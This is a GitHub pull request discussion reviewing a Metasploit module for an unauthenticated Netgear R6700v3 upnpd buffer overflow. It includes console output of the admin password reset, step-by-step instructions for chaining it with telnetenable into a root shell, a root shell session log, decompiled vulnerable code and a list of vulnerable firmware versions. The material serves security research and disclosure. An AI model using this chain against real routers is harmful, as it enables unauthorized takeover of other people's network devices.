Netgear r6700 lan rce
rapid7/metasploit-framework pull request #13768
Opened 2020-06-25 13:32 UTC by rdomanski

Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/ms08_067_netapi`
- [ ] ...
- [ ] **Verify** the thing does what it should
- [ ] **Verify** the thing does not do what it should not
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

If you are opening a PR for a new module that exploits a **specific** piece of hardware or requires a **complex or hard-to-find** testing environment, we recommend that you send us a demo of your module executing correctly. Seeing your module in action will help us review your PR faster!

Specific Hardware Examples:
* Switches
* Routers
* IP Cameras
* IoT devices

Complex Software Examples:
* Expensive proprietary software
* Software with an extensive installation process
* Software that requires exploit testing across multiple significantly different versions
* Software without an English language UI

We will also accept demonstrations of successful module execution even if your module doesn't meet the above conditions. It's not a necessity, but it may help us land your module faster!

Demonstration of successful module execution can take the form of a packet capture (pcap) or a screen recording. You can send pcaps and recordings to [msfdev@metaspolit.com](mailto:msfdev@metaspolit.com). Please include a CVE number in the subject header (if applicable), and a link to your PR in the email body.

2020-06-25 13:39 UTC, bcoles commented on modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
> +      'uri' => 'soap/server_sa HTTP/1.1',
`HTTP/1.1` shouldn't be required here. Also, the path should begin with `/`.

2020-06-25 13:39 UTC, bcoles commented on modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
> +      'uri' => 'soap/server_sa HTTP/1.1',
`HTTP/1.1` shouldn't be required here. Also, the path should begin with `/`.

2020-06-25 13:39 UTC, bcoles commented on modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
> +    end
Duplicated conditionals.

2020-06-25 13:39 UTC, rdomanski commented
Adding pcap.
[netgear_r6700_lan.pcapng.zip](https://github.com/rapid7/metasploit-framework/files/4831618/netgear_r6700_lan.pcapng.zip)

cc @pedrib

2020-06-25 14:22 UTC, pedrib commented on modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
> +      'uri' => 'soap/server_sa HTTP/1.1',
path should be as is to trigger vulnerable condition

2020-06-25 14:22 UTC, pedrib commented on modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
> +      'uri' => 'soap/server_sa HTTP/1.1',
same as above

2020-06-25 14:24 UTC, pedrib commented on modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
> +      'uri' => 'soap/server_sa HTTP/1.1',
regarding HTTP/1.1, I think we added this because it was sending /1.0 be default? @rdomanski can you confirm?

2020-06-26 05:57 UTC, pedrib commented on modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
> +    end
Fixed it

2020-06-26 07:48 UTC, pedrib commented
@bcoles turns out it works fine with the forward slash, although it doesn't need it. But we discussed and believe that it's better to add the slash to make it more "standard", for evasion purposes.

Can you give it another shake?

2020-06-29 05:29 UTC, tekwizz123 commented
Realized I have this router available for testing in my collection so I'm happy to go ahead and set this up for testing and confirm the module works as planned. Will assign my work account @gwillcox-r7 tomorrow to this issue and see if we can't get around to reviewing it and then testing it.

2020-06-29 05:31 UTC, tekwizz123 commented on documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md
> +[Netgear R6700v3 Firmware V1.0.4.82_10.0.57](http://www.downloads.netgear.com/files/GDC/R6700v3/R6700v3-V1.0.4.84_10.0.58.zip)
This download link looks like its for v1.0.4.84_10.0.58, not for v1.0.4.82_10.0.57. Can you confirm this is the right link?

2020-06-29 15:56 UTC, rdomanski commented on documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md
> +[Netgear R6700v3 Firmware V1.0.4.82_10.0.57](http://www.downloads.netgear.com/files/GDC/R6700v3/R6700v3-V1.0.4.84_10.0.58.zip)
Sorry, I mixed up when linking that firmware, It's fixed now.

2020-06-29 16:05 UTC, gwillcox-r7 requested changes
Overall module looks pretty good, with a few minor changes needed here and there. The major issues I have is with the check method and detecting other vulnerable versions, which I feel isn't complete, and the fact that right now this module does not give a shell in and of itself but instead requires the user to run another module to get shell.

Finally we will need a CVE for this issue before merging it in, but @todb-r7 can help there.

2020-06-29 16:05 UTC, gwillcox-r7 commented on modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
> +      print_status("3- Enjoy your root shell!")
Nice documentation! Would like to see this automated if possible but in any case this is still very useful information for the user and I appreciate you including this in here 👍

2020-06-29 16:43 UTC, pedrib commented on documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md
> +This module exploits a buffer overflow vulnerability in the upnpd daemon (/usr/sbin/upnpd), running on the router Netgear R6700v3, ARM Architecture, firmware version V1.0.4.82_10.0.57 and V1.0.4.84_1
It's likely older versions are affected, but we only really investigated these two firmwares, and to be honest investigating further would be too time consuming

2020-06-29 16:46 UTC, gwillcox-r7 commented
Quick update but confirmed the module is working as expected on a Netgear R6700v3 router running firmware version v1.0.0.4.84_10.0.58. Here is the output:

```
msf5 > use auxiliary/admin/http/netgear_r6700_pass_reset
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > show options

Module options (auxiliary/admin/http/netgear_r6700_pass_reset):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    5000             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host

msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > check

[*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.84_10.0.58) as the target.
[+] 192.168.1.1:5000 - The target is vulnerable.
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > exploit
[*] Running module against 192.168.1.1

[*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.84_10.0.58) as the target.
[+] 192.168.1.1:5000 - HTTP payload sent! 'admin' password has been reset to 'password'
[*] To achieve code execution, do the following steps manually:
[*] 1- Login to 192.168.1.1 with creds 'admin:password', then:
[*]     1.1- go to Advanced -> Administration -> Set Password
[*]     1.2- Change the password from 'password' to <WHATEVER>
[*] 2- Run metasploit as root, then:
[*]     2.1- use exploit/linux/telnet/netgear_telnetenable
[*]     2.2- set interface <INTERFACE_CONNECTED_TO_ROUTER>
[*]     2.3- set rhost 192.168.1.1
[*]     2.3- set username admin
[*]     2.4- set password <WHATEVER>
[*]     2.5- run it and login with 'admin:<WHATEVER>'
[*] 3- Enjoy your root shell!
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) >
```
Confirmed when I logged in again that the password for the user `admin` had been reset to the default of `password`. Still confirming other side of things with getting the telnet component enabled though.

2020-06-29 16:46 UTC, pedrib commented on documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md
> +The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does not need any authentication to abuse it. After exploitation, an attacker will be able to us
The default admin is reset to 'password', and this is not selectable due to the way the exploit works. You can find out why in the advisory, it's quite a good read! We'll add a note in the docs regarding it.

2020-06-29 16:52 UTC, pedrib commented
@gwillcox-r7 we agree that ideally we would identify all vulnerable firmwares and adjust the check and exploit methods accordingly but to be honest would take a lot of effort and honestly we don't have time for it!

2020-06-29 16:53 UTC, pedrib commented
@gwillcox-r7 regarding the use of telnetenable, there are two blockers:
a) the password reset has to be done manually in the interface by the user (check the video in the advisory); changing this to automate it would involve a significant reverse engineering effort to understand the web app (it's not straightforward, there's some basic obfuscation going on)

b) integrating and testing the code is another significant amount of effort, and as per above, we don't really have the time for it

2020-06-29 16:54 UTC, pedrib commented on modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
> +            [ 'CVE', 'YYYY-XXXXX'],
ZDI also said they are on it, so better to coordinate

2020-06-29 16:55 UTC, pedrib commented on modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
> +          'Radek Domanski (@RabbitPro | radek.domanski@gmail.com)'      # Vulnerability discovery and Metasploit module
yes, agree, we'll fix this

2020-06-29 16:55 UTC, pedrib commented on documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md
> +msf5 exploit(linux/telnet/netgear_telnetenable) > set interface enxd03745775fdd
see answer below

2020-06-29 16:56 UTC, pedrib commented on modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
> +            [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Tokyo2019/tokyo_drift.md'],
For fairness (we both worked on it), do you mind if we keep it? Also useful in case one moves the advisory around in the future

2020-06-29 16:56 UTC, pedrib commented on modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
> +    end
See answer below

2020-06-29 16:56 UTC, pedrib commented on modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
> +      fail_with(Failure::Unknown, "Unknown firmware version, can't proceed, please contact the authors")
See answer below regarding testing of other firmwares

2020-06-29 17:04 UTC, gwillcox-r7 commented
> @gwillcox-r7 we agree that ideally we would identify all vulnerable firmwares and adjust the check and exploit methods accordingly but to be honest would take a lot of effort and we don't really have the time for it!

Wasn't saying that you would need to exploit all of them, but at least saying something like "hey this version was detected, please conduct further research to confirm if it is vulnerable or not" would help the end user. Ultimately though, with details from the CVE confirming which versions are affected, we should be able to go "hey this is version X, we don't have support for it but we know it is vulnerable". I'm not asking you to write exploits for all affected versions as I completely agree that would take too long, but we should be able to use the existing version grabbing code to tell the user if their target is likely vulnerable or not.

2020-06-29 17:18 UTC, gwillcox-r7 commented
Okay so looks like running from within WSL did change things a little bit so don't take it as a negative, but I did have to supply the `MAC` option (thanks @wvu-r7 for explaining this and making sure his exploit is robust!). Here is my output:

```
msf5 > use exploit/linux/telnet/netgear_telnetenable
[*] No payload configured, defaulting to cmd/unix/interact
msf5 exploit(linux/telnet/netgear_telnetenable) > set interface eth0
interface => eth0
set msf5 exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1
rhost => 192.168.1.1
setmsf5 exploit(linux/telnet/netgear_telnetenable) > set username admin
username => admin
set pmsf5 exploit(linux/telnet/netgear_telnetenable) > set password password123
password => password123
msf5 exploit(linux/telnet/netgear_telnetenable) > set MAC 3C3786D7BE96
MAC => 3C3786D7BE96
msf5 exploit(linux/telnet/netgear_telnetenable) > set interface eth0
interface => eth0
explomsf5 exploit(linux/telnet/netgear_telnetenable) > exploit

[+] 192.168.1.1:23 - Detected telnetenabled on UDP
[+] 192.168.1.1:23 - Using creds admin:password123
[*] 192.168.1.1:23 - Generating magic packet
[*] 192.168.1.1:23 - Connecting to telnetenabled via UDP
[*] 192.168.1.1:23 - Sending magic packet
[*] 192.168.1.1:23 - Disconnecting from telnetenabled
[*] 192.168.1.1:23 - Waiting for telnetd
[*] 192.168.1.1:23 - Connecting to telnetd
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.1:23) at 2020-06-29 12:13:05 -0500

whoami

Login incorrect
 login: admin
admin
Password: password123



BusyBox v1.7.2 (2019-10-19 12:12:12 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# id
id
uid=0(admin) gid=0(root)
# uname -a
uname -a
Linux R6700v3 2.6.36.4brcmarm+ #17 SMP PREEMPT Sat Oct 19 11:17:27 CST 2019 armv7l unknown
#
```

2020-06-29 17:21 UTC, gwillcox-r7 commented on modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
> +      'uri' => 'soap/server_sa HTTP/1.1',
Marking this as resolved as I have confirmed this is now fixed and @bcoles original issue has been addressed as he requested.

2020-06-29 17:22 UTC, gwillcox-r7 commented on modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
> +      'uri' => 'soap/server_sa HTTP/1.1',
Marking this as resolved as I have confirmed this is now fixed and @bcoles's original issue has been addressed as he requested. Also the path was changed and still works fine for triggering the bug and checking things so no issues there.

2020-06-29 17:23 UTC, pedrib commented
We are not comfortable using the versions described in the advisory as a guide. From our experience, vendors are clueless and make frequent errors listing vulnerable versions.

We would like to keep the check method as is in order to to give wrong information to the user, and add some comments to the description and docs.

We don't really see the point of having a check method that says "maybe it's vulnerable, but you have to rewrite the exploit yourself".

2020-06-29 17:26 UTC, pedrib commented
By the way, I just noticed the comment above might be a bit too aggressive. We will certainly add more detail into the docs and description to make the user understand, but I don't think changing the check method is a good idea as it can give the wrong information.

2020-06-29 17:45 UTC, rdomanski commented
> Okay so looks like running from within WSL did change things a little bit so don't take it as a negative, but I did have to supply the `MAC` option (thanks @wvu-r7 for explaining this and making sure his exploit is robust!). Here is my output:
> 
> ```
> msf5 > use exploit/linux/telnet/netgear_telnetenable
> [*] No payload configured, defaulting to cmd/unix/interact
> msf5 exploit(linux/telnet/netgear_telnetenable) > set interface eth0
> interface => eth0
> set msf5 exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1
> rhost => 192.168.1.1
> setmsf5 exploit(linux/telnet/netgear_telnetenable) > set username admin
> username => admin
> set pmsf5 exploit(linux/telnet/netgear_telnetenable) > set password password123
> password => password123
> msf5 exploit(linux/telnet/netgear_telnetenable) > set MAC 3C3786D7BE96
> MAC => 3C3786D7BE96
> msf5 exploit(linux/telnet/netgear_telnetenable) > set interface eth0
> interface => eth0
> explomsf5 exploit(linux/telnet/netgear_telnetenable) > exploit
> 
> [+] 192.168.1.1:23 - Detected telnetenabled on UDP
> [+] 192.168.1.1:23 - Using creds admin:password123
> [*] 192.168.1.1:23 - Generating magic packet
> [*] 192.168.1.1:23 - Connecting to telnetenabled via UDP
> [*] 192.168.1.1:23 - Sending magic packet
> [*] 192.168.1.1:23 - Disconnecting from telnetenabled
> [*] 192.168.1.1:23 - Waiting for telnetd
> [*] 192.168.1.1:23 - Connecting to telnetd
> [*] Found shell.
> [*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.1:23) at 2020-06-29 12:13:05 -0500
> 
> whoami
> 
> Login incorrect
>  login: admin
> admin
> Password: password123
> 
> 
> 
> BusyBox v1.7.2 (2019-10-19 12:12:12 CST) built-in shell (ash)
> Enter 'help' for a list of built-in commands.
> 
> # id
> id
> uid=0(admin) gid=0(root)
> # uname -a
> uname -a
> Linux R6700v3 2.6.36.4brcmarm+ #17 SMP PREEMPT Sat Oct 19 11:17:27 CST 2019 armv7l unknown
> #
> ```

Did you try to increase the timeout and set the interface? Default value in telnetenable might not be enough. 

`msf5 exploit(linux/telnet/netgear_telnetenable) > set timeout 1500`

2020-06-29 17:45 UTC, todb-r7 commented on modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
> +            [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Tokyo2019/tokyo_drift.md'],
Well, they're two sources for literally identical text. This seems like a recipe for tokyo drift drift here as soon as someone makes an edit later.

I'm with @gwillcox-r7 , it would be better for both of you just to pick one and just make sure the other guy is prominently credited.

2020-06-29 17:46 UTC, rdomanski commented on documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md
> +```
done.

2020-06-29 17:46 UTC, todb-r7 commented on modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
> +            [ 'CVE', 'YYYY-XXXXX'],
Yeah since this was discovered as part of ZDI's thing, I would expect ZDI to handle the CVE reservation and population. If they fail to do that, @pedrib , we can step in. I nominate @kernelsmith to keep an eye on that :)

2020-06-29 17:47 UTC, rdomanski commented on documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md
> +## Scenarios
changed the formatting. I think we can't produce the output for a previous version now. But original exploit was developed on V1.0.4.82_10.0.57 so it's kind of guaranteed it works.

2020-06-29 17:47 UTC, rdomanski commented on documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md
> +~~~
done.

2020-06-29 17:54 UTC, gwillcox-r7 commented
> By the way, don't get me wrong, I just noticed the comment above might be a bit too aggressive. We will certainly add more detail into the docs and description to make the user understand, but I don't think changing the check method is a good idea as it can give the wrong information.

Hmm fair I see what your saying here, I'm just concerned that right now there isn't any option within the `check` method that returns `Exploit::CheckCode::Safe` right now, and also if the version isn't one of the two you have confirmed, we just automatically assume its a unknown version which doesn't really make sense to me. At the very least I would like to see you print the version out to the end user and just state its not a currently supported version. Additionally if we know which firmware version patches this vulnerability, then we should add that in so that if the version detected is equal to or greater than that version we can tell the user it isn't vulnerable. I can assist with doing some extra tests on this side of things.

That is just my general thoughts, though I have spoken to @wvu-r7 privately and he has conveyed to me why the vendor advisories are often not correct so I appreciate you letting me know this and agree that its probably best to double check before reporting a version as vulnerable or not.

2020-06-29 17:56 UTC, gwillcox-r7 commented
> > Okay so looks like running from within WSL did change things a little bit so don't take it as a negative, but I did have to supply the `MAC` option (thanks @wvu-r7 for explaining this and making sure his exploit is robust!). Here is my output:
> > ```
> > msf5 > use exploit/linux/telnet/netgear_telnetenable
> > [*] No payload configured, defaulting to cmd/unix/interact
> > msf5 exploit(linux/telnet/netgear_telnetenable) > set interface eth0
> > interface => eth0
> > set msf5 exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1
> > rhost => 192.168.1.1
> > setmsf5 exploit(linux/telnet/netgear_telnetenable) > set username admin
> > username => admin
> > set pmsf5 exploit(linux/telnet/netgear_telnetenable) > set password password123
> > password => password123
> > msf5 exploit(linux/telnet/netgear_telnetenable) > set MAC 3C3786D7BE96
> > MAC => 3C3786D7BE96
> > msf5 exploit(linux/telnet/netgear_telnetenable) > set interface eth0
> > interface => eth0
> > explomsf5 exploit(linux/telnet/netgear_telnetenable) > exploit
> > 
> > [+] 192.168.1.1:23 - Detected telnetenabled on UDP
> > [+] 192.168.1.1:23 - Using creds admin:password123
> > [*] 192.168.1.1:23 - Generating magic packet
> > [*] 192.168.1.1:23 - Connecting to telnetenabled via UDP
> > [*] 192.168.1.1:23 - Sending magic packet
> > [*] 192.168.1.1:23 - Disconnecting from telnetenabled
> > [*] 192.168.1.1:23 - Waiting for telnetd
> > [*] 192.168.1.1:23 - Connecting to telnetd
> > [*] Found shell.
> > [*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.1:23) at 2020-06-29 12:13:05 -0500
> > 
> > whoami
> > 
> > Login incorrect
> >  login: admin
> > admin
> > Password: password123
> > 
> > 
> > 
> > BusyBox v1.7.2 (2019-10-19 12:12:12 CST) built-in shell (ash)
> > Enter 'help' for a list of built-in commands.
> > 
> > # id
> > id
> > uid=0(admin) gid=0(root)
> > # uname -a
> > uname -a
> > Linux R6700v3 2.6.36.4brcmarm+ #17 SMP PREEMPT Sat Oct 19 11:17:27 CST 2019 armv7l unknown
> > #
> > ```
> 
> Did you try to increase the timeout and set the interface? Default value in telnetenable might not be enough.
> 
> `msf5 exploit(linux/telnet/netgear_telnetenable) > set timeout 1500`

This seems to have worked but I don't know if this was cause I already exploited the router with this same exploit just prior to this attempt. Might be good to add to the documentation anyway as a note in case users do encounter similar issues.

2020-06-29 19:06 UTC, gwillcox-r7 commented
Hmm so one other thing I'm noticing is that this exploit seems to only work once per reboot of the router, so its a one shot exploit (this is also confirmation of the second target working):

```
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > show options

Module options (auxiliary/admin/http/netgear_r6700_pass_reset):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.1.1      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    5000             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host

msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > exploit
[*] Running module against 192.168.1.1

[*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.82_10.0.57) as the target.
[+] 192.168.1.1:5000 - HTTP payload sent! 'admin' password has been reset to 'password'
[*] To achieve code execution, do the following steps manually:
[*] 1- Login to 192.168.1.1 with creds 'admin:password', then:
[*]     1.1- go to Advanced -> Administration -> Set Password
[*]     1.2- Change the password from 'password' to <WHATEVER>
[*] 2- Run metasploit as root, then:
[*]     2.1- use exploit/linux/telnet/netgear_telnetenable
[*]     2.2- set interface <INTERFACE_CONNECTED_TO_ROUTER>
[*]     2.3- set rhost 192.168.1.1
[*]     2.3- set username admin
[*]     2.4- set password <WHATEVER>
[*]     2.5- run it and login with 'admin:<WHATEVER>'
[*] 3- Enjoy your root shell!
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > exploit
[*] Running module against 192.168.1.1

[-] Auxiliary aborted due to failure: unknown: Failed to obtain DeviceInfo:1#GetInfo
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/netgear_r6700_pass_reset) >
```

Lets add in this to reflect this under the `update_info()` section:

```
'Notes' =>
          {
            'Stability' => [ CRASH_SERVICE_DOWN ],
            'SideEffects' =>   [ CONFIG_CHANGES ],
            'Reliability => [ UNRELIABLE_SESSION ]
          },
```

You can find the definitions for this at https://github.com/rapid7/metasploit-framework/wiki/Definition-of-Module-Reliability,-Side-Effects,-and-Stability, but the nutshell version is as this exploit will crash the service we should make a note of this. We should also make a note of the fact that we will change the config as part of the exploit (due to resetting the password), and that the module should only actually trigger once (put this via UNRELIABLE_SESSION as I don't see a better option at the moment to convey this).

This is mainly needed for those users who may want to search modules by potential side effects to determine if they are okay for use on their engagements.

2020-06-29 19:25 UTC, gwillcox-r7 commented on documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md
> +This module exploits a buffer overflow vulnerability in the upnpd daemon (/usr/sbin/upnpd), running on the router Netgear R6700v3, ARM Architecture, firmware version V1.0.4.82_10.0.57 and V1.0.4.84_1
@pedrib New comments look good, thanks for including this :) Marking as fixed

2020-06-29 19:26 UTC, gwillcox-r7 commented on documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md
> +The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does not need any authentication to abuse it. After exploitation, an attacker will be able to us
Thanks look good, will read more into the writeup :) Marking as resolved

2020-06-29 19:30 UTC, gwillcox-r7 commented on documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md
> +```
Looks good thanks for fixing this @rdomanski!

2020-06-29 19:31 UTC, gwillcox-r7 commented on documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md
> +## Scenarios
Got output below from both versions so happy to fix this up if needs be, otherwise feel free to use my output which should be for both versions and should provide the necessary info.

2020-06-29 20:14 UTC, rdomanski commented on documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md
> +## Scenarios
Thanks for the output! I added it to the documentation file. Feel free to adjust it if needed.

2020-06-29 21:06 UTC, gwillcox-r7 commented
Okay so cause I just can't keep my hands off of reversing stuff when given the opportunity I decided to take a look at the updated code in R6700v3-V1.0.4.94_10.0.69 and found some updated code for the `sa_setBlockName` function which can be seen in the disassembly shown below (taken from Binary Ninja). Note that whilst `scanf_str` is still `memset()`, it is never used in this function (I guess they never removed this call for some reason???) Additionally the original `scanf` operation has been changed from `%d%s` to `%d`. The combination of these two fixes means that it is not possible to cause a buffer overflow via the `scanf` operation anymore, as any input provided will inevitably be cast to a 32 bit long integer via `%d`, and the statically sized buffer is no longer used anywhere.

```
int32_t sa_setBlockName(int32_t char * block_name, int32_t len)

00024d74  int32_t var_1c = 0
00024d8c  int32_t var_41c = 0
00024d98  void var_13a0
00024d98  void scanf_str
00024d98  memset(&scanf_str, 0, 1020, &var_13a0)
00024dac  print_debug(3, 0x43c04, 0x43a30)  {"sa_setBlockName"}  {"%s(%d);\n"}
00024db0  int32_t returnValue
00024db0  if (len == 0)
00024db4      returnValue = len
00024ddc  else if (sscanf(char * block_name, 0x4930c, &var_1c) != 1)  {"%d"}
00024de0      returnValue = 0
00024df0  else
00024df0      returnValue = strstr(char * block_name, 0x662c8)
00024df4      if (returnValue != 0)
00024dfc          int32_t r1 = returnValue + 1
00024e04          int32_t r6_1 = (char * block_name - r1) + len
00024e08          if (r6_1 u>= 0x400)
00024e0c              returnValue = 0x2be
00024e20          else
00024e20              memcpy(&var_41c, r1, r6_1)
00024e34              int32_t __saved_r4
00024e34              *((&__saved_r4 + r6_1) - 0x404) = 0
00024e38              strToLower(&var_41c)
00024e48              if (strstr(&var_41c, 0x662c8) != 0)
00024e58                  void var_839c
00024e58                  void* r7_2 = &var_839c
00024e68                  int32_t r0_9 = getTokens(&var_41c, 0x662c8, &var_839c, 0x80)
00024e6c                  int32_t r8_1 = r0_9 - 0
00024e6c                  if (r0_9 != 0)
00024e84                      qsort(&var_839c, r8_1, 0x80, 0x24a20)
00024e94                      int32_t r6_3 = 0
00024e98                      memset(&var_41c, 0, 0x400)
00024ea4                      do
00024ea4                          strcat(&var_41c, r7_2)
00024eac                          r6_3 = r6_3 + 1
00024ec0                          r7_2 = r7_2 + 0x80
00024ec4                          memcpy(&var_41c + strlen(&var_41c), 0x40aec, 2)  {"\n"}
00024ebc                      while (r8_1 u> r6_3)
00024ed4                      int32_t r0_17 = strlen(&var_41c)
00024ed8                      if (r0_17 s> 0)
00024eec                          *((&__saved_r4 + r0_17) - 0x405) = 0
00024ef8              acosNvramConfig_set(0x43c10, &var_41c)  {"bs_keywords_temp"}
00024f04              acosNvramConfig_set(0x3e34c, &var_41c)  {"bs_keywords"}
00024f08              returnValue = 0
00024dc4  return returnValue
```

Anyway that is my update analysis based on what I comparing what I read from the writeup.

2020-06-29 21:10 UTC, gwillcox-r7 commented on modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
> +      fail_with(Failure::Unknown, 'Failed to send HTTP payload... try again?')
Thanks for fixing this @rdomanski :)

2020-06-29 21:11 UTC, gwillcox-r7 commented on modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
> +            [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Tokyo2019/tokyo_drift.md'],
Extra link was removed, so marking this as resolved.

2020-06-29 21:11 UTC, gwillcox-r7 commented on modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb
> +          'Radek Domanski (@RabbitPro | radek.domanski@gmail.com)'      # Vulnerability discovery and Metasploit module
Looks good @pedrib! Marking as fixed

2020-06-29 21:23 UTC, gwillcox-r7 commented on documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md
> +## Scenarios
Looks good to me, thanks for updating this @rdomanski! Marking as resolved :)

2020-06-29 21:42 UTC, gwillcox-r7 commented
Can we add in https://kb.netgear.com/000061982/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Routers-Mobile-Routers-Modems-Gateways-and-Extenders as this references ZDI-CAN-9642, ZDI-CAN-9643 and links them to PSV-2019-0296, to tie your ZDI advisories to the NetGear advisory?

2020-06-29 22:14 UTC, gwillcox-r7 commented
Also another update: Looks like the `sa_setBlockName` function could have been added with firmware version v1.0.2.62_10.0.46, as versions prior to this that I checked didn't have the string `sa_setBlockName`, but had other `sa_set` strings defined.

Here is the copy of the function from this firmware version which looks to be vulnerable albeit the vulnerability is slightly different:

```
int32_t sa_setBlockName(char* block_name, int32_t length)

0002368c  int32_t scanf_int = 0
000236a4  int32_t scanf_str = 0
000236b0  void var_13a0
000236b0  void var_418
000236b0  memset(&var_418, 0, 0x3fc, &var_13a0)
000236c4  sub_b5c0(3, 0x41be8, 0x419cc)  {"sa_setBlockName"}  {"%s(%d);\n"}
000236fc  if (length != 0 && sscanf(block_name, 0x41bf4, &scanf_int, &scanf_str) == 2)  {"%d%s"}
0002370c      int32_t r0_5 = strstr(block_name, 0x64000)
00023710      if (r0_5 != 0)
00023724          void* r6_1 = (block_name - (r0_5 + 1)) + length
0002372c          memcpy(&scanf_str, r0_5 + 1, r6_1)
00023740          int32_t __saved_r4
00023740          *((&__saved_r4 + r6_1) - 0x404) = 0
00023744          strToLower(&scanf_str)
00023754          if (strstr(&scanf_str, 0x64000) != 0)
00023764              void var_839c
00023764              void* r7_2 = &var_839c
00023774              int32_t r0_11 = getTokens(&scanf_str, 0x64000, &var_839c, 0x80)
00023778              int32_t r8_1 = r0_11 - 0
00023778              if (r0_11 != 0)
000237ac                  qsort(&var_839c, r8_1, 0x80, 0x23338)
000237bc                  int32_t r6_3 = 0
000237c0                  memset(&scanf_str, 0, 0x400)
000237cc                  do
000237cc                      strcat(&scanf_str, r7_2)
000237d4                      r6_3 = r6_3 + 1
000237e8                      r7_2 = r7_2 + 0x80
000237ec                      memcpy(&scanf_str + strlen(&scanf_str), 0x3ea88, 2)  {"\n"}
000237e4                  while (r8_1 u> r6_3)
000237fc                  int32_t r0_19 = strlen(&scanf_str)
00023800                  if (r0_19 s> 0)
00023814                      *((&__saved_r4 + r0_19) - 0x405) = 0
00023788          acosNvramConfig_set(0x41bfc, &scanf_str)  {"bs_keywords_temp"}
00023794          acosNvramConfig_set(0x3c4ac, &scanf_str)  {"bs_keywords"}
000236dc  return 0
```

2020-06-29 22:40 UTC, gwillcox-r7 commented
After further examination it seems we have the following list:

### Not vulnerable - potential
R6400v2-V1.0.2.52_1.0.39
R6700v3-V1.0.2.56_10.0.42
R6700v3-V1.0.2.60_10.0.44

### Definitely not vulnerable
R6700v3-V1.0.4.94_10.0.69_BETA

### Vulnerable
R6700v3-V1.0.2.62_10.0.46
R6700v3-V1.0.2.66_10.0.48
R6700v3-V1.0.3.66_10.0.50
R6700v3-V1.0.4.78_10.0.55
R6700v3-V1.0.4.82_10.0.57
